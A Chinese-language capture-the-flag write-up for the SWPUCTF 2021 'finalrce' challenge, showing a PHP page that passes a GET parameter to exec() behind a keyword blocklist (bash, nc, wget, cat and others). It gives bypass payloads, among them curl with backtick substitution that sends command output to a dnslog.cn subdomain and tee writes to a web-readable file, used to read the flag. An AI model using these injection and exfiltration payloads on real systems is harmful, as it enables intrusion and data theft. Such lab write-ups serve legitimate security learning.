[SWPUCTF 2021 新生赛]finalrce

SWPUCTF 2021 新生赛finalrce wp

注:本文参考了 NSSCTF Leaderchen 师傅的题解,并修补了其中些许不足。

此外,参考了 命令执行(RCE)面对各种过滤,骚姿势绕过总结

题目代码:

复制代码
 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

过滤了一堆字符。

这道题的 exec 函数理应返回执行结果的最后一行,但是却什么也不返回,所以需要一些其他的方法来看到命令执行的结果。

过滤关键字的绕过

首先我们知道关键字被过滤时可以使用以下绕过方式:

如 ls 被过滤,可以替换为

复制代码
l''s

l\s 

等等。

但是由于 $* 等字符被过滤了,这里能用的恐怕只有前两种。

了解了这些之后来构造几种 payload 。

DNSlog 带外命令执行

DNS 的网站这里写一下:

http://www.dnslog.cn

http://ceye.io

临时使用的话推荐去第一个网站。

复制代码
curl `l''s`.xf3njn.dnslog.cn

用反引号执行 ls 命令,执行的结果拼接到 xf3njn.dnslog.cn 域名上,然后访问,访问的日志可以在网站上看,就可以看到命令执行的结果。

ls 执行的结果是 index.php

这样的话我们直接查找根目录下包含 "f" 的文件:

复制代码
curl `l\s /|grep 'f'`.xf3njn.dnslog.cn

返回结果:

找到了。

查看 flag 文件:

这里因为 "la" 也被过滤了,所以多加了一个斜杠。

复制代码
curl `ca\t /flllll\aaaaaaggggggg`.xf3njn.dnslog.cn

返回结果中的大括号被去掉了,自己加上,另外把开头小写的 nssctf 改成大写就行了。

tee 关键字将结果保存到文件中

执行 ls 文件并将结果保存到当前目录的 1.txt 文件中:

复制代码
l\s|tee 1.txt

执行这条命令后去访问:http://node4.anna.nssctf.cn:28616/1.txt 就可以看到结果了:

这里因为我之前执行过一次,所以多了一个 1.txt 文件。

同理可以查看 flag :

复制代码
ca\t /flllll\aaaaaaggggggg|tee 2.txt

拿到 flag :

此外,还有 tac,head,tail 等命令也可以代替 cat 查看文件内容。

相关推荐
两个人的幸福10 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
BingoGo12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820713 天前
PHP 扩展——从入门到理解
php
鹏仔先生14 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作
php
云水一下14 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建
开发语言·php
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
xingpanvip14 天前
星盘接口开发文档:本命盘接口指南
android·开发语言·css·php·lua
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制
web安全·ddos